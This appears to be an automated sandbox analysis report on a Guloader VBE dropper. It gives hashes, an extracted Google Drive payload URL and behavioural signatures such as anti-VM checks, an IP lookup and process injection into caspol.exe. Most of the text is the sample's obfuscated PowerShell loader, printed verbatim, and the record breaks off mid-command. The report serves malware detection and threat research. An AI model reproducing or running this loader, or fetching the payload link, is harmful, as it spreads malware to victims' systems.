Analysis
-
max time kernel
148s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
02-02-2023 11:29
Static task
static1
Behavioral task
behavioral1
Sample
transferencia.....vbe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
transferencia.....vbe
Resource
win10v2004-20220812-en
General
-
Target
transferencia.....vbe
-
Size
60KB
-
MD5
880b795347b76a1660b3dfcae7bc28f7
-
SHA1
dd398c1781ddd4f3e69036f4dadde6c643cacd44
-
SHA256
c1435f8fc9a6ffb253811a74d4016f73248b7226d6d5b458c3bf960ee3a38005
-
SHA512
e3ff92ca5ed3cc63bd8e1213a79dfc2574e0e39a126ece3d5890062eccc56ba23efe8f4301e71e3ad1fd3b1f88f9253e8d16d3fe0b73d5e78530f25cd80a7ccc
-
SSDEEP
768:FlRe1yyO99pKzl2VT1Gxxy4tH/dD/ASEGZU2L7Y+yk10iGfzi945EriK:F3GyvLpylJxdfawKQNVMErd
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1dzg1926pnDm935d_Cm4TREqzX4j7oxJl
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 14 4492 powershell.exe 16 4492 powershell.exe -
Checks QEMU agent file 2 TTPs 2 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
Processes:
powershell.execaspol.exedescription ioc process File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe powershell.exe File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe caspol.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 63 api.ipify.org 64 api.ipify.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
caspol.exepid process 3512 caspol.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.execaspol.exepid process 4492 powershell.exe 3512 caspol.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 4492 set thread context of 3512 4492 powershell.exe caspol.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3108 3512 WerFault.exe caspol.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 4932 powershell.exe 4932 powershell.exe 4492 powershell.exe 4492 powershell.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
powershell.exepid process 4492 powershell.exe 4492 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.execaspol.exedescription pid process Token: SeDebugPrivilege 4932 powershell.exe Token: SeDebugPrivilege 4492 powershell.exe Token: SeDebugPrivilege 3512 caspol.exe -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
WScript.exepowershell.exepowershell.exedescription pid process target process PID 4864 wrote to memory of 928 4864 WScript.exe cmd.exe PID 4864 wrote to memory of 928 4864 WScript.exe cmd.exe PID 4864 wrote to memory of 4932 4864 WScript.exe powershell.exe PID 4864 wrote to memory of 4932 4864 WScript.exe powershell.exe PID 4932 wrote to memory of 4492 4932 powershell.exe powershell.exe PID 4932 wrote to memory of 4492 4932 powershell.exe powershell.exe PID 4932 wrote to memory of 4492 4932 powershell.exe powershell.exe PID 4492 wrote to memory of 4732 4492 powershell.exe caspol.exe PID 4492 wrote to memory of 4732 4492 powershell.exe caspol.exe PID 4492 wrote to memory of 4732 4492 powershell.exe caspol.exe PID 4492 wrote to memory of 3512 4492 powershell.exe caspol.exe PID 4492 wrote to memory of 3512 4492 powershell.exe caspol.exe PID 4492 wrote to memory of 3512 4492 powershell.exe caspol.exe PID 4492 wrote to memory of 3512 4492 powershell.exe caspol.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\transferencia.....vbe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.execmd /c echo shell2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ligh = """BlFUfuHanNycButVoiSaoSpnOu MyHFdTUbBSv Sv{Sk Vt Sp Af SkpSkaPrrOsaHomTr(Su[NoSEntBarLyiSpnNegLe]De`$BeuFoeTigKvePsnFonImyAdtOftKuiPh)Ud;me Ak`$KaECikGesShaHomUn Ki=Sy es'Pr'No;Ki UnWTrrFoiFatMieLo-GrHEuoBosNutSt Pa`$ciERnkUnsUdaImmFe;Ca BeWCorMaiSetPleMu-SpHUnoGesEntLo Ru`$WeECokCesAcaSpmMa;Fo SkWSyrMaiaftDoeUr-SkHOpoSksPltpr Ad`$CaEMekAlsShaTamUd;In Si Si Di St`$FlUSonsehdiaWasTitMaiLs Fi=Ce VeNCheBrwSt-tyOPrbAfjBreEncBltdi LibSoyArtBaeSp[No]No To(Ca`$AnuEveFagQueDenAvnAlyDitArtShiSe.MeLAreMintegHotUphOv Fo/Mo Fl2Br)Pr;Ta Fo Io Ko WiFPioPorAs(ni`$AmMGeePlnPadGeiSpcanpNilFiaTinBatLa2Ov1Du6Sl=Hr0Te;so fa`$FoMPleOrnKodToiOvcKrpTalpeaBanPatCh2Bo1Di6Se Ca-DolBrtsi sy`$GuuMeeVagUnePandinHaysmtFltTaiQu.ArLAreAfnTigbetUnhSe;Op ma`$beMFaeLinPrdMoiTucBapSelTrahanEgtub2Ly1Ak6Sy+Un=No2Di)um{Ar So Is Om Sp Sk Ra Tr In`$haUTanSahUhaAgsThtUniIn[Ha`$doMSteKnnBodFoiTucImpDilsvaRanBitho2Ph1Br6Fo/Ol2ta]Be Fe=Ma Ok[KucGroDinMivBreCarVitAc]In:Up:FrTHeoBaBReyMitKoeJe(ba`$AkuSkeSkgAueTenOunEkyMitRetEuiNo.OpSSluBebFisAgtHirGoiHynTigTr(Un`$UsMgreunnVedHeiSncBrpSelDraAvnGotNo2Oa1Jo6To,Na Bo2Sk)Ti,Ka Gr1Fo6Ba)Kv;Th St Br`$PeUEjnWhhThaChsHetSpiEn[ri`$SpMSieBrnTadAaicacDepTylUnaGanHotDi2St1Ba6An/Ul2Pr]De Ne=Lu En(Hy`$TrUPonEahWiaFlsOttNoiSu[Mg`$TrMBeePlnRedKuiSkcRepBulSuaApncatFo2Ov1od6Un/Ti2St]Es Se-HebUnxFloArrCh Di2Re1Kl0Ka)Wi;ae Ge Be Ru bu}Su Ro[CoSSntNurHeiSpnPrgHv]st[PnSYoyDesBetUdeAumBr.EqTDieTexSktEl.TiEVanRucGroHodOmiAtnBigUh]In:Su:GeAprSTrCCrIPeISl.FuGMieJutInSRetCarFoiAnnHygPu(Th`$FrUPenMuhOxatisJitDeiNo)fy;Sv}Ex`$SapBaobilFraGgrBaiBlsCoaCatSmiUd0Br=MyHGeTBaBIf Kr'Da8Re1MiAChBUuABe1DuAPe6EdBCo7LoBReFSnFTaCTeBCe6PiBHoEudBReEKl'Ov;Si`$BopAuotolSoaVirLliBosBiaJetSkiAu1Go=PiHOpTOsBBo Eu'Ko9TeFPrBGeBBaBHv1OnASe0ToBUsDAgASi1MiBSmDcyBRe4StABu6PuFJaCSo8Ar5HaBTeBViBReCMoESu1ReESy0FoFnaCVi8No7DiBMeCBeATe1YeBHu3MiBDe4FlBMu7So9VeCOcBFl3reARe6SaBBrBPrAPr4stBBr7Sa9TrFTeBUn7SoAag6NaBKvAAsBChDBaBCu6spAUl1An'Sa;As`$UnpCroBrlOpaRerOpiTosFiaEntLeiDe2An=ReHhuTReBhu Au'Ch9Th5AfBTh7SiAMi6ko8Ga2OrAMi0TiBCuDKnBOu1Ud9To3MiBba6BaBRe6TeAFr0TaBOp7ElAVa1PrAAl1Br'Mi;sp`$BopIdoUnlInaCarMaiMesKaaUntLeiAu3Va=SoHPeTBeBMi Fl'Pe8Hi1StABrBOuAje1hyALe6MoBGu7unBReFNoFLyCGo8Eq0FaAef7UdBFoCsaAVe6toBGrBPaBstFPrBba7BeFInCDe9SlBStBFaCTrAIn6NoBsk7PlATi0ScBLoDMaASh2Sa8Ti1AnBNi7WrAun0deAHy4PrBAlBMiBAn1OvBOr7AfAop1AdFFoCAb9InACaBDi3VaBClCPhBlo6MoBRoESjBUb7So8Ma0BuBRo7ArBFi4Do'Tr;Gl`$IlpCroSulDraAkrDiiloslgaPrtFoiEr4Ko=SkHTeTToBNe Sk'ugAPo1leAPr6TaATe0InBDeBGoBDeCdrBEn5Pe'Sp;Ev`$DepScoCalRaaKlrTaiNisSkaOvtTuiDe5Be=BaHCaTTiBIn Sc'Ri9Bi5HoBEs7BaAPh6pa9BeFskBNoDChBTe6DuAPh7RaBBlERoBCa7Ab9SaAKaBMi3ImBkrCElBWa6AbBprEudBAl7no'Un;Ph`$StpMeoUnlDeaVarReiPrsTraOutvaiEx6Fl=PlHprTKoBIn Li'Py8we0Du8Vr6Co8Oo1NiAOl2UnBBl7MaBCo1HeBsuBunBmu3luBSpEzy9FjCSpBBe3SvBAtFEvBTu7TiFAfEReFJo2Su9ZoAKaBSeBInBOm6ThBLi7Sk9ri0CuATeBVa8no1FoBFyBMoBUn5CoFDeEBaFPe2Th8Bu2LeABe7UnBGu0RaBTeEPnBFoBpiBBa1Aa'Ja;un`$SepDiokalSpaRirFoiCasPraVatStiMa7ca=PaHInTFsBSn Ra'Om8No0EmAWa7HyBMoCBaAIn6avBPaBAaBMaFTiBDr7LiFCoEGrFPo2Ma9SeFaaBHi3FoBKlCAfBLa3MaBpe5DiBTr7FoBHo6ga'Ko;Hy`$BrpSkoSalFeaAbrCliStsBaaPltMiiPr8Ba=ReHYaTKoBIn Re'Sy8Dr0LyBSc7ReBUv4zoBBeEbeBNr7KoBGl1CoAOs6EfBPl7ReBPh6Ak9Pr6FoBJu7KuBTaEAqBUn7BuBSt5GiBSi3HeAKr6GyBRe7Ta'Fi;sg`$bepTooColSmaUnrYdiGasToaCatEniBa9Ar=SaHTeTVrBPa Ag'Ls9VuBMoBNeCAd9heFCoBCh7ScBGiFafBAfDPiAFu0MiAReBGi9SmFPeBRaDInBTy6MeAUn7afBTrENoBFa7Fu'te;St`$KrYbiaOprAldPeiSt0Ri=VrHWoTStBMa Ka'ni9GaFFoAskBBl9Ma6StBGr7CoBTeEEkBLe7MeBst5PaBBu3BiADr6CoBDe7ka8Gl6KaARhBMuARe2DrBTe7Te'Au;In`$UlYTaaAdrKadSeiBr1Cr=TaHHoTGaBKv Ga'Zi9Bi1wrBMiEUnBCl3AfASc1CiAve1FiFOvEReFRi2an8Po2SlASu7MuBBv0PhBpeEduBFiBpeBMo1DiFChEGuFGy2El8Ti1UnBOn7AtBAs3InBKaEAcBGe7UdBWe6BiFEfELoFGt2mi9Wh3kuBPrCOvAHe1AfBBrBUn9Re1FaBLoEShBDi3GrAJo1ViAVa1HoFtrEFiFDe2Gi9Da3PaASk7HaATi6OoBUnDBl9Id1EnBtuESvBOv3OvAin1InAPa1Fa'Re;Ag`$KrYbraVerkrdreiSk2Kr=AvHReTSeBun ca'Dd9StBNeBBaCDiAPr4BrBfiDVeBEd9PsBDi7Ma'Er;Pr`$StYDaaMirRedBuiPr3Ko=AbHAcTpoBHo In'St8Gu2LrATo7PrBTe0ClBInEStBBaBRiBOv1ReFNyETrFVe2Gu9FoAReBUdBAvBki6DiBBy7No9Ab0FaADoBSa8no1AnBUdBReBUn5whFJaEAdFIn2Bl9PlCUnBTi7AdALi5So8Bu1BrBUiEprBMyDMaANo6UnFFuESeFfa2ud8Ou4QuBMoBSeABe0MaAeb6TaAVa7TuBVe3VaBPaESe'Ec;In`$SlYAtaClrAudMaifo4na=EsHBeTlaBDe Je'Tr8De4SeBBlBUnANo0ReAAr6FeAPa7AnBMi3PrBBeETo9ko3SqBReEPuBUnELiBFoDSaBMe1He'In;Ca`$ApYPuaAnrCodFriMi5Un=DiHMoTHaBAc St'JeBBeCBiATo6AdBCr6BeBciEOrBNoEen'Id;Mo`$SlYCraAurTodCriAf6Em=FiHDoTVaBMa Un'Pa9ByCUnASk6Au8Sa2JuABh0SuBBrDvaAFa6KoBLo7OpBUd1BlANo6fl8Wo4FaBSaBPeAZo0kaAAb6MuARe7ShBAl3jaBToEPh9ArFMeBBy7AfBHnFFiBSpDDeABu0SkAApBtp'Ho;Ba`$BeYLaaAdrHydFeiIn7St=UdHOrTEfBSp Tr'gn9MrBDe9An7sp8ReACo'Da;Is`$UpYMiaUnrIndRaiDe8Un=CiHFoTOeBZe Tr'Pe8UpEDu'Se;Db`$LiRFeuoubLnePefMoatocSotst=AnHVeTFoBAf Bl'Sa8Be7In8Ch1In9Or7Re8ci0HeETa1AsELe0to'Pi;Fo`$BrOafvFeeBerScpSp=TeHmeTGtBFi Ce'Dr9Bi1PeBMo3GeBApEUnBSpEir8Co5FrBSmBCiBGeCFeBSa6FeBPaDMiAkr5De8La2MoAAd0NoBChDUnBIm1Co9Ku3Un'Re;difPeusunEkcJotDaiDeoSlnBu FefUdkPrpGi Fr{PhPDeaDerAkaLamCo Sk(Sn`$VeDCheToyunsGroBosRapPo,Fl Pi`$HyETemLiaTwnFeaBetBoiEmsDi)Pa Un Un ra Hy Di;Ni`$UnvDiiUneWatHa0St Co=UfHTiTEkBMi Fo'ReFfr6Cl9NoAReBFo7SyATaAMoBKl3SkBRo7BiFca2BeESiFNoFPe2UnFchAFo8Fl9Re9El3teABo2TrAEk2Wa9El6GeBAuDFoBViFSyBKn3AkBPiBAdBCrCHe8noFLeESk8LnERe8Se9an1urAKr7StAfl0StADj0haBPr7DeBNuCSoAAn6Bu9In6stBUnDPaBMiFSuBCe3ReBHeBOmBSnCStFAfCUn9ap5DmBIn7otABa6st9Ja3PhAIn1UdACo1HyBTr7TiBslFGeBIn0UfBanEPaBSjBExBFo7SkAPa1PrFThAKhFFiBBeFWe2NoAUnESaFHj2Ge8Le5YnBLeAMeBPr7DeARe0AfBHu7PlFFoFSl9InDunBFo0ToBYo8StBwo7UnBRe1TyALa6FoFTr2crAPr9SeFre2ExFDi6Id8SkDGrFRiCUn9Ek5ScBKuEBoBRaDBeBAg0InBBy3IdBMiESa9Ra3leAHi1KaAov1TeBKe7OpBAnFEtBCi0ThBOrEetAPoBSu9Vi1IrBFe3vaBPa1UnBSnAOpBFa7NoFco2AnFDjFGo9Al3JvBOpCSeBUn6OpFDe2ReFRe6We8NoDSpFcoCrg9ToEkoBCrDFaBTy1BaBHo3AnAVe6InBHoBLuBHuDCeBFjCOpFWaCAf8Bo1AnAPr2inBJoEDdBCaBTlALi6LeFFaASkFHj6Me8HiBJeBIn3OfAMe0DoBMi6FuBBeBdoESmAIrFLyBGr8tu9LgFBlFSeESa3Mo8TeFReFAcCAc9Pa7LaAFu3DiABo7VaBNe3EkBurESaAMa1SaFSeAFoFOp6CoAin2HaBUnDReBTiECrBSk3KaAIr0UnBKaBSpAAg1ClBRe3NoASt6RaBBoBMyEBr2PrFTeBVeFBo2KoASoFedFMeBToFReCDe9No5InBCi7SlAIn6Fo8Re6ArABlBDaAPa2BeBBa7LsFPaAGeFUn6InAvi2joBSaDPlBGeEOxBBl3TyAKe0ElBHiBKaAAn1GrBWa3CiApr6TjBCaBCeEMe3StFRiBVo'Ko;Ma&Ba(Ge`$ErYReaTrrindAkiTa7Fo)Lu Se`$MivMeiGleUntBr0Sk;Te`$BavPaifreRatUn5Tr in=s OpHBoTDoBMu Mi'ScFVe6Ma8Ki1TeBMo9SeAPu0LiBMiBGrBSa6HaAMu6ReFGr2ReEFaFMcFla2NuFDe6Po9ScAJeBRa7ReABaAEsBEu3alBGe7unFOsCFi9hv5RiBCa7TeAFr6Cr9ReFVaBBo7ToAVi6BoBOvAEtBthDMiBMo6PeFEnABeFSt6UdASo2AnBMoDKrBReEDcBSt3MaAVr0DeBDeBFiAHa1FlBSt3MaASt6PrBPaBTvEPr0PlFHoEUnFRe2Pa8ds9Vo8Sg6OpAjoBStAHe2LaBat7Va8No9Ro8MiFSy8MaFheFFa2Un9Rr2OxFSpABaFAb6AbAHo2MoBHeDSlBHaESaBBe3ClAti0LuBSeBUaADi1HyBRi3VeAFo6AnBBrBSuEBl1BlFWaEFrFRe2InFBu6SaApe2CoBDaDFrBphEAnBUd3FiAIs0BaBtiBunAFi1BoBHu3AsAPl6CaBOnBOtEBr6OmFDeBGiFUnBSp'Ta;Se&Un(Fa`$DiYCoaUdrJedHyiSu7Tr)Lb Mo`$TevSqiLoeActLu5Da;Af`$tevPeiSaeNetDe1Ef Un=Gl FoHamTBdBMa Li'opAAs0scBGo7MyACh6AuAPt7MeAVe0ThBSpCLuFTy2GrFGe6Tu8Ly1HaBJe9ReADd0OvBZaBAaBJi6SaABr6ThFreCBi9AfBpeBJoCMeAAn4PrBHeDEvBTe9EsBSa7TaFDyAriFLo6WeBPaCLaANi7LeBPhEToBImEMuFExEPrFOb2Fi9Be2FoFApAVe8Pu9Ut8Pa1PiAGaBHyAFo1CaANi6DeBEl7SoBUnFUdFAdCLs8Dm0UnAUd7PlBMiCsvAPs6UdBViBMiBDeFPrBDu7SeFSaCIn9OuBbeBFjCDaAOu6SaBDe7StAbe0NoBunDGrABd2Sk8Fd1ClBBr7MyAGn0TrASn4RaBMaBUnBSu1LyBNo7HoAFl1GgFHsCse9TaAHtBKl3TrBCoCTiBLa6RuBTrEFoBRi7An8Ov0UnBEs7FeBAd4Af8miFneFsaAHv9soCMlBTa7LnAJe5KaFOuFCy9PaDamBYo0UdBSt8SeBAb7ChBSt1VuAPi6SoFUn2Ke8Af1BrAInBfeAPr1FoAor6IsBSk7HaBDiFChFElCUv8Ud0naASp7DiBFrCBaAca6EmBUnBstBBrFDdBNo7ReFSoCDe9WaBElBSiCKoAHa6HeBAx7BuAMe0OpBQuDduAIn2Re8Pu1diBPa7FrACe0EbABo4IdBHeBAdBLe1DiBBu7SaAva1FrFDiCSo9SwAHaBBa3ArBLeCInBUr6BiBslEIlBOp7St8Op0blBKo7KaBIn4LuFAmANeFLoASk9PuCHeBRd7ViAfi5GuFOpFFr9EnDLsBVi0GaBBe8DoBRe7SkBTa1ReAAd6VeFAv2Fa9TiBunBDeCRuAAi6ki8Sp2SkASy6SvASk0RaFTiBFiFTiESkFKl2inFRoAIgFFo6Ni9BaAAaBLa7LiACoABiBCr3CoBMe7BeFBiCTi9va5fiBTy7BrASo6St9MiFLaBHo7FaASp6VaBCrAFlBJuDInBPa6PlFPlAFrFNo6PaACr2KaBReDInBUnEGrBIn3BrAOp0KaBKnBimADi1ArBUn3AfADe6FlBTyBKrETy7NeFmaBEnFFoBKaFDeCex9PuBKlBLiCGrATo4AkBToDPrBBo9ChBMe7EmFDeAFaFco6RaBMaCFoAMi7DiBBrENaBSuEUrFPeEStFHa2Bi9Sk2PaFalAPhFUd6Os9Tr6SuBSt7BeABeBUnAKa1NoBThDAfAPo1BlAsi2ReFOvBSuFBoBSyFElBLoFJaBBaFCaELeFMi2ImFAt6so9Te7SkBCoFHsBMu3CeBHyCEvBFl3MoASg6TjBAnBenALo1HyFSkBPhFQuBSl'Mo;Du&Bo(br`$SaYreaPrrvadUniUn7St)Qu po`$EnvRaiHoeMetEq1fi;Im}AcfBauRvnDicPrtGgiDaoVinPu AtGPiDBuTOu Fl{HoPOpamarPoaInmGr cu(Nr[FlPIsaGirSkaAsmNyeDetDeetirBi(UsPEloCysanitatBaiFuoArnMa Pr=Av Ka0ba,St ByMToaBunUddcaaHetUnoMarDiyOu Tr=In Le`$UhTTerfruSeeMa)En]Ko No[SpTMayEppCoeKo[Tr]Ud]Al Jo`$ChPCaeUrnSasVaiMeoSenUn,Lu[SkPSvaAlrUbaClmReeBrtGaeDirMs(JoPLaoFrsDoibltAmiEmoHjnMi Or=Gu tr1No)Ho]No Ha[inTReyblpSreUn]Ov Le`$OmMGreBlnBrdEgiOpcCa en=Wa Me[MiVTaoTwiShdRe]He)Co;No`$MavopiReeFatNo2Fi Sk=Ju LeHMiTAnBHj Co'NeFAb6Ge8Ga0KiBFo7BeAOb1EpATr7BoAja0AvARe0VsFBr2VdEJoFFlFPr2In8Sa9Sy9Pa3IbADa2ByASt2Va9Vi6BiBCrDreBRuFcoBUn3SnBBrBMaBFlCSf8tuFshESu8DiELa8Fo9Fe1FiAPr7AiASu0UnAWi0JoBCr7piBScCarAKl6Di9St6ElBNoDSuBTiFalBSt3EdBFrBCaBUnCArFInCBi9Ic6PhBBi7crBtr4KlBBeBFdBMoCGuBpi7Sk9St6PoABeBUvBLaCgaBRe3spBSpFclBReBJiBDe1Fo9Mi3BrAAn1HlAJo1UnBba7CoBEkFJuBBi0BlBHaEsoAHoBBaFPrADrFkoAFe9LaCKrBPr7DyATa5AbFStFAl9MyDMaBCe0PrBId8KaBUr7SpBBr1DyACo6AfFEx2Nr8Sa1AlAViBSkAFl1KnANa6InBUn7FrBPlFBuFBeCKl8Na0LeBFo7ReBPr4GaBPlEAfBNe7PeBLi1ReAOu6GaBBeBSeBByDSuBFaCFoFSoCUn9Op3SkADm1LyAIn1soBSp7FiBOmFBeBMe0ExBUnEOxABlBPl9ScCAnBIn3ApBHjFDrBBe7CrFSuALsFSj6CrADo2LaBHyDEuBOpEElBBy3HoAun0SeBHjBseAAd1SpBSh3JeAMo6klBFhBNeECoALaFUnBSiFFeBbuFTaEMiFVa2ta8br9Di8mi1inABaBAnAKo1BdARe6BrBPr7ByBSuFafFSuCAc8Ra0AkBFo7KaBFg4OvBSaEScBBe7BlBEl1HaATa6YvBDeBUdBFnDHaBbiCAbFFaCCl9St7CuBScFImBdeBKoAFa6drFAnCLg9No3riALe1DiASk1KrBun7ReBChFAnBUn0RoBUnEHeAUnBSo9su0CaAUd7UrBPaBOmBKaEFoBBu6UtBHa7ThASe0No9Pe3UnBen1UdBTr1BoBWo7boATe1peATi1co8SeFMiEAu8MiELo8Hv8br0FoAch7teBDiCDrFssBUnFAwCFi9St6AvBCh7BaBSo4WiBSuBPlBReCReBRe7Ny9De6AcAOmBDoBFaCMaBIn3PiBFuFlaBLoBPoBSp1Ma9NoFJeBAlDChBIn6DiAPa7BiBSmENoBBe7TrFPaAByFRe6OpAFy2SmBDeDKrBCaEMeBDa3FrAKr0AcBJoBTrAHy1AbBAx3SuAIs6suBPnBOvEGaBHeFbrEExFgl2SkFto6SuBek4UnBCa3TiBNoEGlASy1ChBDe7ToFFoBFrFBaCEd9Ts6BoBka7BiBde4AsBUdBOvBTiCLiBkl7Th8Sa6FoAStBCaANa2ViBSp7OmFKrAMaFNi6Th8BrBSkBSv3StARy0AkBNu6BiBSmBOuEDe2MeFStELiFTr2AdFTi6Pa8BaBRiBTa3HoATr0seBRa6ReBskBRoEKk3FeFRaEFoFSa2Ha8Im9Ov8me1ShAViBLeAPh1FoAUn6BlBSt7KvBcoFloFDeCFe9UnFDeADe7TrBAfEmiACo6inBSuBTrBMi1HeBBl3GuAPe1BuAWh6Ar9so6EnBWo7GoBWrEkoBAv7meBsh5PiBSt3PaARe6BuBPr7In8SaFAfFOuBFi'Ti;In&Fa(Ud`$UlYGraChrgadapiRe7Br)Lo mi`$NevVeiOmematBr2Ma;Cr`$BovHuiSlePhtMi3gu Li=Af SaHNsTTrBRi Fr'ThFNu6Pr8Ca0StBCo7BoASk1BrAKo7SkASf0PiALn0AnFCeCIn9mi6enBRe7VoBHj4KoBOcBOtBSuCInBSp7Kr9Li1InBGeDByBGoCHyAFo1ViASa6BaAMa0BoAPa7ruBOv1CyAFr6udBsaDLaAHa0PlFAnAPrFRe6CyAPi2OvBTaDFoBTaEheBCo3FuAEs0SpBbrBSlAIn1HaBPo3KlADo6BrBZoBInEKo4DeFfiEHaFBi2op8ch9Ma8Il1InAmoBBoAPi1SnAMi6DoBco7ThBInFSkFWhCUn8St0MeBPu7LkBUn4KoBFiEMyBSo7FoBMe1SpASi6NaBSuBNiBAlDAcBLiCScFSpCno9lu1AnBUn3SkBKrEThBSjEjoBMaBEpBGrCCoBOr5Re9Ga1GrBPeDGaBOvCPaASa4PaBPr7HuBnoCfrABo6SaBFlBTiBTaDPaBAkCGlASa1Sp8SuFPrENo8AnEsk8te8Un1SkAEt6AfBFa3WaBInCNdBOk6SpBKm3CaAFr0CeBZo6NeFInEBiFUn2TyFHv6sl8Sk2FoBKm7NeBEfCDeAUn1VoBStBboBDaDWoBfaCSaFRiBFaFSpCUn8St1DiBTr7FeAId6di9ReBSeBImFDiADe2OcBImETuBDe7AvBUrFLaBBr7RuBCrCDiAFu6SlBlo3syAAn6DyBSpBUdBMiDLaBPnCJe9Of4PaBUdEBeBLy3OvBMe5UnARe1AnFAnASlFAf6ToAPo2AsBApDRiBOvEPrBco3BeAKa0niBBrBSkARi1BrBKr3PoALn6SaBFaBDaEBl5SiFsmBAp'Gr;Vi&Pu(By`$PiYUnaIlrsadBeiBe7Sc)An Ri`$TivCoiVgeCutCl3to;Sa`$SpvfoiMoeKotPl4An Or=Be PrHNoTPeBBa Ku'BeFAr6ya8Fo0EyBSt7MaAAk1RiASa7BeATa0BrAzy0SlFgeCEl9Ti6AnBLe7WiBSk4DiBBoBUnBTrCJuBMi7Ra9ibFNaBre7PuAUd6OmBboASaBFeDBuBla6HoFUnASpFSo6Ex8SkBPhBSa3UdAre0TeBCo6FiBInBJuEMe0prFskESiFBr2trFin6Wa8BeBFnBGu3ErATs0ZlBCi6AsBHaBCaETi1FoFArELiFRe2DeFFa6pr9DkFReBSm7WaBReCafBHa6PeBLuBLaBPr1AnFBiEGkFDi2InFBl6ar8In2SaBHu7StBReCFlASt1maBSkBRuBSiDJuBLeCSkFHyBMaFEmCpr8Fa1AcBMu7loABo6Ti9CaBVeBPiFChATu2DoBDeEReBRe7PrBSmFMiBSe7TiBAcCNeAAm6SaBRa3NeAFl6SpBDaBAsBPeDPuBHoCKo9Mo4NaBPhEUdBSh3DeBAm5plAGy1EpFBiAFlFPh6GaAKa2DeBClDPyBPrELyBBe3ElACo0SkBShBGeAIn1SkBSu3AsANs6VeBTeBPsERe5AfFCoBNi'De;at&Ve(Fo`$PlYOmaazrStdReiko7Tr)Ko Ou`$HavGeihoeDatdi4Ao;Wh`$BavMaiHyeFjtqu5Th Sa=La StHPoTErBHa Aa'BlASk0FoBSl7UnATr6SoADi7heAGe0DoBUnCDaFFa2TeFSa6Un8Hj0FoBKl7VeASu1AdATo7LaAKe0RoANa0BeFPrCIn9Tr1LaAAc0KiBAm7OuBAp3StAin6MaBDe7In8Mi6SvAPaBUdAEx2NaBUd7SkFMaAArFAsBKl'Pr;Hu&Em(Su`$SkYEsaCerThdSoiHy7Sa)St da`$SovVriNyetrtMt5ab Ov De Ma;Kn}Me`$MaMCooSpnProcogHurDoaFimSasSn Gy=Pa SuHInTUnBCu No'InBPi9CoBMa7OrABr0MaBSoCKrBLi7PrBLsEHeEKa1PhEOm0Ll'Su;ko`$BevStiPieGutUd6Wa Ke=Ti SkHStTRiBFr Pr'UnFSt6SoARe1MoBBa9ChABi7UnBFo7ceARe1SyANe2MeFFo2PiELiFSoFBu2Ph8To9Sk8Un1TvATiBMiATo1SlAMa6BlBNy7miBTiFNoFRuCAp8Be0AnAeq7BeBUdCmaASk6SuBFeBdiBGaFSpBGe7SqFViCKo9KuBSlBDiCAbATe6UnBFr7InAPr0EkBSkDHeAMa2Un8Ti1GlBDi7WrAFr0UdAHo4SkBGaBJaBKa1FrBRh7MaAAg1UnFOrCBl9MeFFuBko3StAFo0SuAMu1AlBfeADiBPa3ChBNoEPr8MeFReEBe8MaEPa8Di9Fr5ApBDi7SeALu6Fe9No6BaBKl7FoBTeEAnBDi7MaBIn5roBKa3ShAVe6NoBNo7Kl9Sv4poBBeDSuAbi0Py9Fl4AdADy7MaBMeCPaBOx1ThASt6InBHjBAnBveDOvBBuCSa8Re2SuBUfDSaBWoBHeBomCpoADr6PaBEk7AiABr0viFpaAInFPrAUdBRe4LuBEl9EpAOp2flFbr2MiFFo6Fc9TrFmoBIvDReBFoCDuBCaDToBMi5DaAGu0BrBFl3OmBPaFIsAKa1avFTe2EcFSt6Fr8BoBDkBMe3KaASk0SjBTh6BlBCeBPoEPo6BuFWoBReFCoEFrFAl2LaFDiAPl9Re5Jv9No6Ra8Co6SsFBa2in9Me2TeFSoAUm8Ba9St9FoBSwBSoCPeAMa6Eq8Sk2reAHf6ReACa0Pu8caFTuFLeEInFPh2Ha8Ag9Pe8Op7At9DiBMaBDiCBoAaf6SaESm1BoEFl0ri8NiFTyFPeEDiFKr2Ro8Cy9Co8Un7De9ChBKlBTeCSvACo6DoEUn1UnEWi0Di8HaFBoFCoEFeFFi2Tr8Be9Ho8Fi7Ri9KlBMaBViCNoATa6GnEUn1PrEbe0Ce8SnFLaFUdBPaFOv2FoFCeASl8Ti9Co9HaBHjBSpCSpAbo6Le8Ri2StAPr6OrATi0Il8tiFkuFGeBFoFReBSpFEfBOl'Uf;Do&Ve(Ox`$afYViaStrHadTriTi7Fi)St Ny`$CovBeiRyeAutLi6De;Me`$CaTPawBriBucLakMapChlFouAb Su=Ha StfOvkFipSy Mu`$StYGlaSarIsdsaiUn5Dr Tr`$UnYUnaHerShdBoipa6Re;mo`$OpvPaiNeetytHa7St Re=Mi 